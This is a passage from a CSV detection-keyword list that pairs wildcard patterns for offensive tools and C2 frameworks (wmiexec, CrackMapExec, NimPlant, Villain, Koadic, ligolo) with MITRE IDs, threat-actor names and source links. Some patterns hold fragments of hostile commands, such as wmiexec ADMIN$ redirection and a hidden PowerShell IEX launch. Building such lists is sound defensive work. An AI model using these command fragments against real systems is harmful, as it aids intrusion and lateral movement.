TA0005,N/A,N/A,Discovery,https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/,1,0,greyware tool - risks of False positive !,6,9,N/A,N/A,N/A,N/A -*cmd.exe /c zoom1.msi*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - 
FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c /start /min powershell.exe -nop -c*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral 
movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral 
movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c start *stage1.exe 1*,offensive_tool_keyword,malware,Destructive Malware targeting organizations,T1486 T1059,TA0008,N/A,N/A,Ransomware,https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe*\TEMP\ScreenConnect\*.cmd*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cmd/backdoor.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*cmd/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/localrelay*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 
- T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/merlinagent/*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cmd/merlinagentdll/*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cmd/setuid.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*cmd_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*cmd_powershell.cpp*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*cmd_shellcodex64.*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - 
TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*cmd_shellcodex86.*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Cmd-Execute-Assembly.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Cmd-Inline-Execute.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*cmdinspector OFF*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*cmdinspector ON*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*cmdshell *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Cmd-Shinject.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Cmd-Upload.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*cme -d * -*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme -d *localhost*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting 
networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-macOS-latest-*,offensive_tool_keyword,crackmapexec,macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-ubuntu-latest-*,offensive_tool_keyword,crackmapexec,ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-windows-latest-*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral move,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme/cme.conf*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme_bloodhound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_dfscoerce_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_get-desc-users_pass_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z 
-*cme_get-desc-users_pass_results*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_gpp_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ldap-checker_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_MachineAccountQuota_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ms17-010_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_mssql_priv_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ntlmv1_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_passpol_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_petitpotam_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_printnightmare_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_runasppl_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_shadowcoerce_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_smb_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_smbsigning_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_subnets_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - 
TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_trusted-for-delegation_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_auth_ldap_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_auth_smb_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_nullsess_smb_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_webdav_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_zerologon_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme-macOS-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme-ubuntu-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme-windows-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cmpivot.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*cms400net_default_userpass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmVmbGVjdGl2ZQ==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
